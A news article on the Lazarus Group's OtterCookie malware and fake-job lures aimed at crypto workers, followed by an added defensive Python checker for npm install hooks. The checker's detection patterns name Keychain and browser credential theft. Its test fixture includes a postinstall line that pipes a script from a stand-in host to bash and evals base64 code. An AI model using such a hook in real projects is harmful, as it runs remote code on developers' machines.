Lazarus Group targets professionals with OtterCookie malware

North Korea-linked hacking group Lazarus is reportedly using a new malware strain called OtterCookie to target people working in crypto and finance.

According to a June 6 alert posted on X by web3 security firm SlowMist, the group is reportedly using fake job interviews, deepfake recruiter videos, and malware-laced coding challenges to deliver the stealer malware. OtterCookie can extract browser-stored credentials, macOS Keychain passwords, digital certificates, and private keys from crypto wallets.

It allows attackers to quietly steal confidential data from targeted systems, particularly macOS machines. The tactic is gaining traction as attackers rely less on large-scale exploits and more on highly targeted, social-engineering-based methods.

The latest malware appears to be part of Lazarus Group's continuous efforts to penetrate the cryptocurrency industry. The group was responsible for February's historic $1.5 billion Bybit hack, in which it compromised cold wallet signers through social engineering and spear phishing.

In recent months, Lazarus has also launched npm package attacks aimed at developer environments and wallet infrastructure, including Solana (SOL) and Exodus. In April, the FBI and cybersecurity firm Silent Push seized a fake website used by Lazarus, known as "Blocknovas," which posed as a U.S.-based tech company to deliver malware through job scams.

According to SlowMist, crypto professionals should exercise caution when responding to unsolicited job or investment offers, particularly if they require downloading files or participating in video calls with strangers. Users should improve endpoint detection and response, refrain from running unknown binaries, and routinely inspect systems for unusual activity.
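One concrete way to act on that advice before opening an unsolicited "coding challenge": check the project's package.json for npm install hooks, since those run shell commands automatically on `npm install` and are the usual carrier in npm-delivered malware. The script below is an added example written for this page, not code from the article, SlowMist, or any OtterCookie analysis; the hook names are real npm lifecycle events, but the suspicious-command patterns, the three verdict levels, and the sample package.json inputs are the editor's own assumptions and constructed data, not a published OtterCookie signature.

```python
"""Pre-flight check for an unsolicited npm project: flag install-time hooks.

Added example for this article, not the article's or SlowMist's code.
The heuristics below are assumptions for illustration, not an OtterCookie
signature; the sample package.json documents are constructed test data.
"""
import json
import re
from typing import Dict, List

# npm lifecycle scripts that run automatically during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Assumed heuristics for commands that fetch, hide, or decode code at install time.
SUSPICIOUS = {
    "remote_fetch": re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sh|bash|zsh|node)\b"),
    "eval_or_decode": re.compile(r"\b(eval|base64|atob|Buffer\.from)\b"),
    "hidden_script": re.compile(r"(^|[\s/])\.[A-Za-z0-9_-]+\.(js|mjs|cjs|sh)\b"),
    "credential_store": re.compile(
        r"security\s+find-(generic|internet)-password|login\.keychain|Login Data|Cookies",
        re.I,
    ),
}


def scan_package_json(text: str) -> List[Dict[str, object]]:
    """Return one finding per install hook present, with the heuristics it tripped."""
    pkg = json.loads(text)
    scripts = pkg.get("scripts") or {}
    findings = []
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        reasons = [name for name, rx in SUSPICIOUS.items() if rx.search(cmd)]
        findings.append({"hook": hook, "command": cmd, "reasons": reasons})
    return findings


def verdict(text: str) -> str:
    """'ok' = no install hooks; 'review' = hooks present but nothing matched;
    'block' = a hook matched at least one suspicious pattern."""
    findings = scan_package_json(text)
    if not findings:
        return "ok"
    if any(f["reasons"] for f in findings):
        return "block"
    return "review"


# Constructed sample inputs (not real packages).
BENIGN = json.dumps({"name": "interview-task", "scripts": {"test": "jest", "build": "tsc -p ."}})
HOOK_ONLY = json.dumps({"name": "interview-task", "scripts": {"prepare": "husky install"}})
MALICIOUS = json.dumps({
    "name": "interview-task",
    "scripts": {
        "test": "jest",
        "postinstall": "curl -s https://cdn.example.invalid/s.sh | bash && "
                       "node -e \"eval(Buffer.from('Y29uc29sZS5sb2coMSk=','base64').toString())\"",
    },
})

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("hook-only", HOOK_ONLY), ("malicious", MALICIOUS)):
        print(label, verdict(doc), scan_package_json(doc))
```

A "review" verdict is not a clean bill of health: a hook that merely runs another local file still executes whatever that file contains, so read the referenced script too. Running the check in a throwaway VM, rather than on the workstation holding wallet keys and the Keychain, is the safer default regardless of the verdict.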

So far this year, the crypto industry has taken the heaviest hit from high-profile hacks. Q1 losses amounted to more than $1.6 billion, and the trend appears to be continuing. PeckShield estimates that losses from hacks totaled $244.1 million in May. Two significant events were the $220 million Cetus Protocol hack and the $12 million Cork Protocol exploit.
